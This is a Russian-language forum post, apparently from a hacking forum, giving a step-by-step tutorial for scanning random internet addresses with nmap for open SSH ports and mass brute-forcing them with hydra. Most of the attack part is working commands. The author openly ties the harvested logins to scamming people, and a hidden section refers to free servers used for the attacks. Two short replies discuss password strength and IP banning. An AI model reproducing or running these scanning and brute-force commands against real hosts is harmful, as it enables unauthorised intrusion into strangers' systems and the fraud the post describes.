Доброго здоровьичка и крепких нервов, форумчане. Тема сегодняшнего урока - брутфорс с помощью замечательной hydra, цели для которой получим nmap'ом. Ликбез: nmap - сканер сетей, с его помощью мы будем сканировать нужный сервер на предмет открытого порта. hydra - брутфорсер. Итак, берём Debian-дистрибутив. Он может быть установленной первой/второй/единственной системой, может быть установлен виртуалкой, но лучше всего - использовать vds/vps. Естественно, нам нужен терминал. Я обычно терминалом пользуюсь из-под рута, чего вам не советую, но для исключения в дальнейшем тупых вопросов в духе "пишет, что у меня недостаточно прав. что делать? помогите", первая команда будет: Код: sudo -i или Код: su Вводим рут-пароль (да, никаких звёздочек, крестиков или черточек не должно вводиться при вводе пароля, вводится вслепую). Готово, вы - суперпользователь. Первым делом обновляем списки пакетов и устанавливаем необходимое: Код: apt-get update apt-get install -y nmap hydra Я сканировал случайные ip на предмет открытого 22-го порта. если вам нужен другой порт, поставьте свой в команде ниже. Заводим nmap: Код: nmap -v -Pn -iR [количество случайных ip] -p [номер порта] --open | grep ([0-9]{1,3}[\.]){3}[0-9]{1,3} > /home/iplist Если же у вас есть свой список адресов, вместо -iR [количество случайных ip], вводите -iL [пусть к файлу]. Здесь еще присутствует grep - он парсит из "грящного" вывода nmap'а ipv4-адреса и аккуратно записывает их в файл iplist, который находится по пути /home/. После завершения сканирования, проверим, что у нас получилось: Код: nano /home/iplist Там должен быть список адресов, разделённых символом переноса строки (просто каждый айпи с новой строки). Убедившись, что всё хорошо, закрываем nano сочетанием клавиш ctrl+c. Не хватает всего-то списко логинов и списка паролей. Создаём файл с логинами: Код: nano /home/loginlist В редактор пишем, вставляем из буфера обмена логины, жмём ctrl+x, соглашаемся с сохранением. Тот же фокус проделываем и со списком паролей, только пишем/вставляем из буфера обмена уже не логины, а пароли и файл называем не loginlist, а, скажем, passlist. Пуск! Код: hydra -L /home/loginlist -P passlist -M iplist -t [кол-во задач(потоков), 16 по умолчанию] -o [путь к файлу для вывода] [назвние сервиса] Спойлер: Вот, кстати, по каким протоколам она работает: asterisk cisco cisco-enable cvs firebird ftp ftps http-{head|get} http-{get|post}-form http-proxy http-proxy-urlenum icq imap irc ldap2 ldap3[-{cram|digest}md5] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 postgres rdp rexec rlogin rsh sip smb smtp smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet vmauthd vnc xmpp Всё! Теперь можно идти разводить людей на предоплату, пока выходной файл не наполнится гудами. p.s. Я говорил, что пользовался для брута серверами, которые брал бесплатно? Так вот я об этом: Скрытый контент. Для просмотра информации необходимо 20 симпатий. Нажмите, чтобы раскрыть... Или Купить ПРЕМИУМ и получить доступ ко всему контенту сайта Эта часть под хайдом, т.к. могут наебнуть школьники. Спасибо за внимание, счастья вам, здоровья и крепких паролей.
Меня вот давно интересует вопрос: возможно ли сгенерировать такой пароль который нереально взломать? Понятно что есть двойна аутентификация и бла-бла-бла. Я так понимаю что это невозможно? Вообще мне всегда было непонятно почему ресурсы позволяют отправлять сотни запросов на один аккаунт с ошибками неверного пароля.. Или как это вообще работает.. Надо будет загуглить, интересно)
Ну, если использовать пароль на пару десятков символов со всевозможными извращениями + банить айпи, которые несколько раз получили отказ, то брутить его будут только фетишисты.
